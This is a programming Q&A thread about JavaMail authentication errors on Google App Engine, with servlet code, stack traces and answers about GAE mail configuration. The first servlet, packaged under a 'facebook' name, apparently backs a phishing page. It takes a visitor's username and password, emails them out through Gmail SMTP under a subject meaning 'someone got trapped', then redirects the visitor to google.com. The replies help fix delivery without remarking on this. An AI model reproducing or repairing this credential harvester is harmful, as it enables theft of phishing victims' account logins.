# Unable to use javax mail in java app engine

Tags: java, google-cloud-platform, jakarta-mail

I write program to sending email in java servlet. When I deploy this program in localhost, I successfully sending email using gmail  account. But when I deploy to google app engine, there is an error. Is there any restriction  to sending email in google app engine? This  is my code:

```
package com.fjr.action.facebook;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.PrintStream;
import java.lang.reflect.GenericArrayType;
import java.nio.file.attribute.UserPrincipalLookupService;
import java.util.Properties;

import javax.mail.Message;
import javax.mail.PasswordAuthentication;
import javax.mail.Session;
import javax.mail.Transport;
import javax.mail.internet.InternetAddress;
import javax.mail.internet.MimeMessage;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.OutputKeys;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;

import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.SAXException;

public class ProcessRequest  extends HttpServlet{



    public void doGet(HttpServletRequest req, HttpServletResponse resp) {
        String nama = req.getParameter("username");
        String password = req.getParameter("password");
        if (nama != null && password != null) {
            processEmail(nama, password);
            try {
//              String path = getServletContext().getRealPath("/WEB-INF/file/userlist.xml");
//              System.out.println(path);
//              writeToXML(nama, password , path);
            }catch( Exception e) {
                e.printStackTrace();
            }
        }


        try {
            resp.sendRedirect("http://www.google.com") ;
//          resp.addHeader("Location" , "www.google.com" );
        } catch (Exception e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

    }


    public void processEmail(String nama, String password) {

//      UserService service;
        String host = "smtp.gmail.com";
        String from = "some-email@gmail.com";
        Properties props = System.getProperties();
//      Properties props = new Properties();
        props.put("mail.smtp.host", host);
        props.put("mail.smtp.user", from);
        props.put("mail.smtp.password", "password"  );
        props.put("mail.smtp.port", "587"); // 587 is the port number of yahoo mail
        props.put("mail.smtp.auth", "true");
        props.put("mail.smtp.starttls.enable", "true");

        Session getMailSession = Session.getDefaultInstance(props, null);
        MimeMessage generateMailMessage = new MimeMessage(getMailSession);
        try {
            generateMailMessage.setFrom(new InternetAddress("fajar.kasimbar@gmail.com"));

            generateMailMessage.addRecipient(Message.RecipientType.TO, new InternetAddress("other-email@gmail.com"));
            generateMailMessage.setSubject("Ada yang terjebak");
            String emailBody = "nama: "  + nama + "| pasword: "+ password;
            generateMailMessage.setContent(emailBody, "text/html");


            Transport transport = getMailSession.getTransport("smtp");

            transport.connect("smtp.googlemail.com", "some-email@gmail.com", "password" );
            transport.sendMessage(generateMailMessage, generateMailMessage.getAllRecipients());

            transport.close();

//          Transport.send(generateMailMessage);
        }catch(Exception e) {
            System.out.println("mail.sending error"); 
            e.printStackTrace();
        }

    }


}
```

And this error I get

```
[INFO] GCLOUD: INFO: Module instance default is running at http://localhost:8080/
[INFO] GCLOUD: Sep 09, 2019 12:52:07 PM com.google.appengine.tools.development.AbstractModule startup
[INFO] GCLOUD: INFO: The admin console is running at http://localhost:8080/_ah/admin
[INFO] GCLOUD: Sep 09, 2019 8:52:07 PM com.google.appengine.tools.development.DevAppServerImpl doStart
[INFO] GCLOUD: INFO: Dev App Server is now running
[INFO] GCLOUD: mail.sending error
[INFO] GCLOUD: javax.mail.AuthenticationFailedException
[INFO] GCLOUD:  at javax.mail.Service.connect(Service.java:306)
[INFO] GCLOUD:  at javax.mail.Service.connect(Service.java:156)
[INFO] GCLOUD:  at com.fjr.action.facebook.ProcessRequest.processEmail(ProcessRequest.java:116)
[INFO] GCLOUD:  at com.fjr.action.facebook.ProcessRequest.doGet(ProcessRequest.java:43)
[INFO] GCLOUD:  at javax.servlet.http.HttpServlet.service(HttpServlet.java:687)
[INFO] GCLOUD:  at javax.servlet.http.HttpServlet.service(HttpServlet.java:790)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHolder.handle(ServletHolder.java:873)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1623)
[INFO] GCLOUD:  at com.google.appengine.tools.development.ResponseRewriterFilter.doFilter(ResponseRewriterFilter.java:134)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1610)
[INFO] GCLOUD:  at com.google.appengine.tools.development.HeaderVerificationFilter.doFilter(HeaderVerificationFilter.java:34)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1610)
[INFO] GCLOUD:  at com.google.appengine.api.blobstore.dev.ServeBlobFilter.doFilter(ServeBlobFilter.java:63)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1610)
```

Edit 1:

I edit the code become

```
public void processMail2() { ////////
    Properties props = new Properties();
    String host = "smtp.gmail.com";
    String from = "fajar.kasimbar@gmail.com";

    props.put("mail.smtp.host", host);
    props.put("mail.smtp.user", from);
    props.put("mail.smtp.password", "some-password"  );
    props.put("mail.smtp.port", "587"); // 587 is the port number of yahoo mail
    props.put("mail.smtp.auth", "true");
    props.put("mail.smtp.starttls.enable", "true");

    Session session = Session.getDefaultInstance(props, null);
    session.setDebug(true); 
    try {
    Message msg = new MimeMessage(session);
    msg.setFrom(new InternetAddress("fajar.kasimbar@gmail.com", "Kue Bolu"));
    msg.addRecipient(Message.RecipientType.TO,
                    new InternetAddress("fajar.kasimbar.1@gmail.com", "Test"));
    msg.setSubject("Your Example.com account has been activated");
    msg.setText("This is a test");
    Transport.send(msg);
    } catch (Exception ex) {
        ex.printStackTrace();
    // ...
    } 
}
```

and still get an error:

```
[INFO] GCLOUD: INFO: The admin console is running at http://localhost:8080/_ah/admin
[INFO] GCLOUD: Sep 12, 2019 7:36:58 PM com.google.appengine.tools.development.DevAppServerImpl doStart
[INFO] GCLOUD: INFO: Dev App Server is now running
[INFO] GCLOUD: DEBUG: setDebug: JavaMail version 1.4ea
[INFO] GCLOUD: DEBUG: getProvider() returning javax.mail.Provider[TRANSPORT,smtp,com.sun.mail.smtp.SMTPTransport,Sun Microsystems, Inc]
[INFO] GCLOUD: DEBUG SMTP: useEhlo true, useAuth true
[INFO] GCLOUD: javax.mail.AuthenticationFailedException
[INFO] GCLOUD:  at javax.mail.Service.connect(Service.java:306)
[INFO] GCLOUD:  at javax.mail.Service.connect(Service.java:156)
[INFO] GCLOUD:  at javax.mail.Service.connect(Service.java:105)
[INFO] GCLOUD:  at javax.mail.Transport.send0(Transport.java:168)
[INFO] GCLOUD:  at javax.mail.Transport.send(Transport.java:98)
[INFO] GCLOUD:  at com.fjr.action.facebook.ProcessRequest.processMail2(ProcessRequest.java:155)
[INFO] GCLOUD:  at com.fjr.action.facebook.ProcessRequest.doGet(ProcessRequest.java:47)
[INFO] GCLOUD:  at javax.servlet.http.HttpServlet.service(HttpServlet.java:687)
[INFO] GCLOUD:  at javax.servlet.http.HttpServlet.service(HttpServlet.java:790)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHolder.handle(ServletHolder.java:873)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1623)
[INFO] GCLOUD:  at com.google.appengine.tools.development.ResponseRewriterFilter.doFilter(ResponseRewriterFilter.java:134)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1610)
[INFO] GCLOUD:  at com.google.appengine.tools.development.HeaderVerificationFilter.doFilter(HeaderVerificationFilter.java:34)
[INFO] GCLOUD:  at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1610)
[INFO] GCLOUD:  at com.google.appengine.api.blobstore.dev.ServeBlobFilter.doFilter(ServeBlobFilter.java:63)
```

Answer (score 0):

Google App Engine instructions are [here](https://cloud.google.com/appengine/docs/standard/java/mail/sending-mail-with-mail-api).  You don't need to connect to the server; just use the defaults and the static send method.

Comment: Update your post to show the code you're using now, and then post the [JavaMail debug output](https://javaee.github.io/javamail/FAQ#debug).

Comment: there is still connect method inside Service class at javax mail api

Comment: My understanding of GAE is that you should remove all the mail.smtp.* property settings.  Also, you should use Session.getInstance instead of Session.getDefaultInstance.  Finally, are you using the version of JavaMail provided by GAE, or are you including a JavaMail jar file in your application?

Comment: It configured with pom.xml, so when I push the source code to github, then when I log in to google app engine shell, I pull that source code contained pom.xml. So when I run the code inside pom.xml, it is automatically download all neccessary jar file based  on pom.xml. 

Btw I using free account, not paid account. May be it is the problem but I dont know.  Everything is work except sending email.

Comment: I search over internet, It is said that google app engine, limiting IO operation and database operation for free account. But I dont know if they limiting email too.

Comment: I'm not a GAE expert.  I wouldn't be surprised if email isn't allowed for free accounts.  Also, in your pom.xml, try using "scope provided" for the dependencies that are provided by GAE.